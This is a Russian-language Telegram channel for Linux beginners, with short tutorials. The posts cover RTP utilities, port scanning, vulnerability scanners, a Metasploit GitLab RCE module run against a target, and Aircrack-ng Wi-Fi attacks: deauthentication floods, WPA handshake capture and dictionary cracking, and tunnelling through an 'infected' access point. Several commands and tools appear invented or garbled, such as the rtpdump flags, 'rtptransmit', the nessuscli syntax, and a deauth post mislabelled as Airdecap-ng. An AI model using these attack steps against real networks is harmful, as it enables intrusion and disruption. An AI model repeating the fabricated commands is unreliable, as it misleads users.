Linux для чайника – Telegram
Linux для чайника
20K subscribers
87 photos
4 files
78 links
Linux
- Разбор утилит / инструментов
- Новости / факты
- Опросы для проверки знаний, навыков
и многое другое.

Только по вопросам сотрудничества: @altmainf

Регистрация в перечне РКН https://clck.ru/3EpL9L
Download Telegram
Анализируем RTP-пакеты

rtpdump - это утилита командной строки в Linux, которая позволяет анализировать содержимое RTP-потоков.

Примеры использования:

rtpdump -i eth0 -F ascii > output.txt
Данный пример захватывает все RTP-пакеты на сетевом интерфейсе eth0 и записывает их содержимое в текстовый файл output.txt в формате ASCII.

rtpdump -F hex -n -t 20200101010101 -u 172.16.0.1 < input.pcap > output.txt
Анализ RTP-потока, записанного в файл input.pcap, с использованием формата вывода hex, ограничивая вывод только пакетами с IP-адресом 172.16.0.1, записанными в период с 1 января 2020 года, 01:01:01, и сохраняя результат в файл output.txt.

rtpdump -r input.pcap -s 0 -t 20210101120000 -T s
Отображение статистики RTP-потока, записанного в файл input.pcap с использованием таймстампов из файла pcap, включая информацию о количестве переданных и принятых RTP-пакетов, среднем размере пакетов и задержке в секундах.
Воспроизводим записанные RTP-потоки

rtpplay - это утилита командной строки в Linux, которая позволяет воспроизводить записанные RTP-потоки.

Примеры использования:

rtpplay input.rtp
воспроизводит RTP-поток, записанный в файл input.rtp.

rtpplay -s 10 input.rtp
воспроизводит RTP-поток из файла input.rtp со смещением времени на 10 секунд.

rtpplay -T 50 input.rtp
воспроизводит RTP-поток из файла input.rtp с ограничением скорости 50%.

rtpplay input.rtp &
воспроизводит RTP-поток в фоновом режиме
Отправляем RTP-пакеты на удаленный хост

rtpsend - это утилита командной строки в Linux, которая позволяет отправлять RTP-пакеты на удаленный хост.

Примеры использования:

1. Отправка RTP-пакетов на удаленный хост:
rtpsend -a <удаленный IP-адрес> -p <порт> -F <формат> -f <файл с данными>

2. Отправка RTP-пакетов с использованием RTCP-отчетности:
rtpsend -a <удаленный IP-адрес> -p <порт> -F <формат> -f <файл с данными> -t <интервал RTCP>

3. Отправка RTP-пакетов с заданным TTL:
rtpsend -a <удаленный IP-адрес> -p <порт> -F <формат> -f <файл с данными> -T <TTL>
TTL - это время жизни пакета в секундах до его уничтожения, если он так и не достиг назначенного адресата.
Передача RTP-пакетов между двумя хостами

rtptransmit - это утилита командной строки в Linux, которая позволяет передавать RTP-пакеты между двумя хостами.

Примеры использования:
1. Передача RTP-пакетов между двумя хостами:
rtptransmit -a <адрес первого хоста> <порт> -z <адрес второго хоста> <порт> -F <формат> -f <файл с данными>

2. Передача RTP-пакетов с использованием RTCP-отчетности:
rtptransmit -a <адрес первого хоста> <порт> -z <адрес второго хоста> <порт> -F <формат> -f <файл с данными> -t <интервал RTCP>

3. Передача RTP-пакетов с разными типами:
rtptransmit -a <адрес первого хоста> <порт> -z <адрес второго хоста> <порт> -F <формат1> -f <файл с данными1> -F <формат2> -f <файл с данными2> ...

Для каждого типа пакетов задается формат через флаг -F и файл с данными через флаг -f. Можно указать любое количество пар флагов -F и -f.
Чем может быть полезен Kali Linux?

Kali Linux - это операционная система, разработанная специально для целей тестирования на проникновение и анализа безопасности.

1. Тестирование на проникновение. Предоставляет множество инструментов, которые могут использоваться для тестирования безопасности сетей, приложений и операционных систем. (сканирования портов, анализ уязвимостей, взлом паролей и т.д.)

2. Исследование безопасности. Предоставляет инструменты для мониторинга сетевого трафика, анализа логов операционной системы, проверки наличия вредоносного ПО и т.д.

3. Разработка безопасных приложений. Предоставляет инструменты для тестирования веб-приложений на уязвимости, для тестирования безопасности мобильных приложений, для работы с криптографией и проверки безопасности кода.

4. Обучение и обучающие цели. Можно использовать для обучения персонала по вопросам информационной безопасности или проведения тренировок по тестированию на проникновение.
С помощью каких инструментов можно просканировать порты в Kali Linux?

Для сканирования портов можно использовать Nmap и Netcat.

Nmap - это мощный инструмент для сканирования портов и анализа безопасности сети.

Пример:
nmap <IP адрес или доменное имя>

Также можно указать диапазон портов, который нужно просканировать, например:
nmap -p 1-1000 <IP адрес или доменное имя>

Netcat - это популярный инструмент для работы с сетевыми соединениями.

Пример:
nc -zv <IP адрес> <порт>
Анализ уязвимостей с помощью Metasploit

Metasploit - это популярный инструмент для тестирования на прочность безопасности сетей и приложений. Он позволяет исследовать уязвимости, эксплуатировать их и управлять удаленными системами.

Команда для запуска Metasploit:
msfconsole

Затем мы можем использовать модуль, который проверит наличие уязвимости в приложении:
use exploit/multi/http/gitlab_11_4_rce

После этого мы можем настроить параметры модуля и запустить атаку:
set LHOST 192.168.1.10
set RHOST 192.168.1.20
run
Поиск уязвимостей в сети с помощью Wireshark

Wireshark - это инструмент для анализа сетевого трафика, который позволяет проверять данные, проходящие через сеть, и находить уязвимости.

Команда для запуска Wireshark:
wireshark

Затем мы можем выбрать сетевой интерфейс и начать захват пакетов:
sudo wireshark -i eth0

После этого мы можем анализировать захваченные пакеты и искать уязвимости в сети.
Использование OpenVAS для сканирования уязвимостей

OpenVAS - это инструмент для сканирования уязвимостей, который предоставляет множество готовых проверок безопасности и позволяет автоматически сканировать веб-сервера, базы данных и другие уязвимые системы.

Команда для запуска OpenVAS:
systemctl start openvas-scanner && systemctl start openvas-manager && systemctl start gsad

Затем мы можем добавить новую цель и запустить сканирование:
omp -u admin -w admin -G --target=192.168.1.20
omp -u admin -w admin -T 192.168.1.20 -m scan
Использование Nessus для сканирования уязвимостей и обнаружения угроз безопасности

Nessus - это инструмент для сканирования уязвимостей сети, который обнаруживает уязвимости с помощью сканирования сети и анализа результатов.

Команда для запуска Nessus:
systemctl start nessusd

Затем мы можем создать новое сканирование и запустить процесс сканирования на целевом устройстве:
nessuscli scan new “Сканирование цели” -t 192.168.1.20
nessuscli scan launch -n “Сканирование цели”
Набор инструментов для тестирования Katana

Katana - это набор инструментов, который предназначен для Kali Linux. Включает в себя более 100 инструментов, которые позволяют проводить тестирование безопасности сетей и приложений.

Чтобы установить Katana на Kali Linux, нужно выполнить несколько шагов:

1. Откройте терминал и выполните следующую команду:
git clone https://github.com/PowerScript/KatanaFramework.git

2. Перейдите в папку KatanaFramework:
cd KatanaFramework

3. Установите необходимые зависимости:
sudo ./dependencies

4. Запустите Katana:
sudo python katana.py

После этого откроется графический интерфейс, который позволит вам выбрать необходимый инструмент для проведения тестирования на проникновение.
Что такое Aircrack-ng?

Aircrack-ng - это набор утилит для анализа и взлома беспроводных сетей, который позволяет тестировать безопасность WiFi-сетей, искать уязвимости и проводить атаки на точки доступа.

1. Откройте терминал.
2. Убедитесь, что у вас установлены все необходимые пакеты:
sudo apt-get install build-essential libssl-dev libnl-3-dev libnl-genl-3-dev ethtool.
3. Скачайте Aircrack-ng с официального сайта:
wget https://download.aircrack-ng.org/aircrack-ng-1.6.tar.gz.
4. Распакуйте архив:
tar -zxvf aircrack-ng-1.6.tar.gz.
5. Перейдите в директорию Aircrack-ng:
cd aircrack-ng-1.6.

6. Выполните команду sudo make для сборки и установки утилит Aircrack-ng.
7. Дождитесь окончания процесса сборки.
8. Выполните команду sudo make install для установки утилит в систему.
9. После установки вы можете запустить Aircrack-ng, вызвав любую из его утилит через терминал.
Какие утилиты включает в себя Aircrack-ng?

1. Airodump-ng - утилита, которая используется для сбора пакетов с беспроводных сетей.

2. Airmon-ng - утилита, которая используется для управления беспроводными интерфейсами.

3. Aireplay-ng - утилита, которая используется для генерации трафика для сбора пакетов.

4. Aircrack-ng - утилита, которая используется для взлома защищенных беспроводных сетей.

5. Airdecap-ng - утилита, которая используется для декодирования зашифрованных пакетов, полученных с помощью Airodump-ng.

6. Airserv-ng - утилита, которая используется для запуска беспроводного сервиса на карте.

7. Airtun-ng - утилита, которая используется для создания беспроводных туннелей.
Утилита для сбора пакетов с беспроводных сетей Airodump-ng

Пример использования:
1. У вас должен быть установлен набор утилит Aircrack-ng

2. Введите команду sudo airmon-ng start wlan0, чтобы установить беспроводной интерфейс в мониторинговый режим.

3. Введите команду sudo airodump-ng wlan0mon, чтобы начать сбор пакетов.

4. Вы должны увидеть список беспроводных сетей, доступных в зоне действия. Сведения о каждой сети будут отображаться в соответствующих столбцах.

5. Для остановки сбора пакетов нажмите Ctrl+C. Вы можете использовать данные, полученные с помощью Airodump-ng, в качестве входных данных для других утилит в составе Aircrack-ng.
Перевод беспроводного интерфейса в мониторинговый режим с помощью утилиты Airmon-ng

Airmon-ng - утилита, которая используется для управления беспроводными интерфейсами.

1. Надо запустить утилиту Airmon-ng командой sudo airmon-ng.
2. Утилита покажет список доступных беспроводных интерфейсов.
3. Выбрать интерфейс, который хотите перевести в мониторинговый режим, и запустить его командой sudo airmon-ng start [название интерфейса].
4. Утилита переведет выбранный интерфейс в мониторинговый режим и переименует его в mon0.
5. Далее вы можете использовать другие утилиты Aircrack-ng, такие, как Airodump-ng или Aireplay-ng, для сбора и анализа данных с беспроводной сети в режиме мониторинга.
6. Для остановки мониторинга выполните команду sudo airmon-ng stop [название интерфейса]. Она вернет выбранный интерфейс в обычный режим.

Примечание: некоторые беспроводные интерфейсы могут уже иметь мониторинговый режим без необходимости использования Airmon-ng.
Атака на беспроводную сеть с помощью утилиты Airdecap-ng

1. Запустите утилиту Aireplay-ng командой
sudo aireplay-ng

2. Укажите тип атаки и целевую сеть (BSSID) командой
sudo aireplay-ng -[тип атаки] -b [BSSID] [название интерфейса]

Например, sudo aireplay-ng -0 10 -b 00:11:22:33:44:55 wlan0 для отправки 10 пакетов деаутентификации к точке доступа с BSSID 00:11:22:33:44:55 через беспроводной интерфейс с именем wlan0.

3. Утилита начнет отправлять пакеты деаутентификации к целевой сети, что приведет к отключению клиентов, подключенных к этой сети.

4. Вы можете использовать другие опции утилиты Aireplay-ng для различных типов атак на беспроводные сети, например, для взлома WPA-PSK ключа можно использовать команду sudo aireplay-ng -0 2 -a [BSSID] -h [MAC адрес атакующего] -e [ESSID сети] [название интерфейса]
Расшифровка зашифрованного трафика Wi-Fi с помощью утилиты Airdecap-ng

Запустите утилиту Airdecap-ng командой
airdecap-ng [зашифрованный файл.pcap] -e [ESSID сети] -p [PSK ключ сети] -o [расшифрованный файл.pcap]

Утилита расшифрует зашифрованный файл и сохранит расшифрованный файл в заданном файле.

Если вы не знаете ESSID и PSK ключа для целевой сети, вы можете использовать другие утилиты Aircrack-ng, такие как Airodump-ng и Aircrack-ng, для захвата и декодирования трафика Wi-Fi в реальном времени.
Создание VPN-канала через зараженную Wi-Fi точку доступа

Запустите утилиту Airtun-ng:
airtun-ng -T [TUN тип] -a [BSSID точки доступа] -i [интерфейс Wi-Fi] --encrypt [шифрование] -b [IP адрес локальной сети] -c [IP адрес клиента]

Утилита создаст VPN-канал через зараженную Wi-Fi точку доступа и настроит соответствующие параметры.

Используйте любое удобное ПО для VPN-клиента, чтобы присоединиться к созданному VPN-каналу и получить доступ к локальной сети, которую подключена зараженная точка доступа.

Обратите внимание, что использование утилиты Airtun-ng без согласия владельца сети или нарушение правил безопасности может быть незаконным и неправомерным.
Взлом тест Wi-Fi-сети с помощью Aircrack-ng

1. Определите имя интерфейса вашей беспроводной сетевой карты, введя команду "iwconfig" в терминале.

2. Введите команду airmon-ng start <имя интерфейса> для запуска беспроводного интерфейса в режиме монитора.

3. Найдите целевую сеть Wi-Fi, введя команду airodump-ng <имя интерфейса монитора> и поиском его в списке сетей, отображаемых в терминале.

4. Запустите атаку захвата пакетов, чтобы получить необходимые данные, используя команду
airodump-ng -c <номер канала> -w <имя файла для сохранения данных> --bssid <MAC-адрес целевой точки доступа имя интерфейса монитора>

5. Запустите атаку взлома, используя данные, полученные на предыдущем этапе, введя команду
aircrack-ng -w <словарь паролей имя файла с данными>

Обратите внимание, что взлом Wi-Fi-сети является незаконным действием и может привести к серьезным последствиям, включая штрафы и уголовное наказание. Рекомендуется использовать Aircrack-ng только в легальных целях и с согласия собственника сети.
Топ-8 самых полезных команд в линуксе

1. cd - используется для перехода в другую директорию.
Например, если вы находитесь в директории /home/user, и хотите перейти в директорию /home/user/documents, вы можете ввести команду "cd documents".

2. ls - позволяет просмотреть содержимое текущей директории. Она выводит список файлов и директорий в этой директории.

3. mkdir - используется для создания новой директории.
Например, "mkdir newdir" создаст новую директорию с именем newdir в текущей директории.

4. rm - используется для удаления файлов.
Например, "rm myfile.txt" удалит файл под названием myfile.txt.

5. grep - используется для поиска строк в файле или выводе другой команды.
Например, "ls -l | grep myfile" найдет все файлы с именем myfile в выводе команды ls -l.

6. top - показывает список процессов, которые выполняются в системе. Она также позволяет просмотреть использование ресурсов процессами.

7. df - показывает информацию об использовании дискового пространства в системе. Она позволяет узнать, сколько свободного места осталось на каждом из дисков.

8. ping - используется для проверки доступности узлов в сети.
Например, "ping google.com" покажет, доступен ли сайт Google и какова задержка при обмене пакетами данных.
GNU Coreutils

GNU Coreutils - это пакет утилит командной строки, который входит в состав операционной системы GNU, а также многих дистрибутивов Linux и других UNIX-подобных операционных систем.

Пакет включает в себя более ста команд, которые используются для управления файлами, процессами, настройки системы и других задач. Некоторые из наиболее часто используемых команд включают:

- ls: список файлов и каталогов в текущей директории
- cp: копирует файлы из одного места в другое
- mv: перемещает файлы из одного места в другое
- rm: удаляет файлы и каталоги
- chmod: изменяет права доступа к файлам
- chown: изменяет владельца файла

GNU Coreutils является открытым ПО и может быть изменен и распространен на условиях лицензии GNU General Public License.
Эти утилиты достаточно мощные и позволяют легко выполнять большой объем разнообразных задач в командной строке.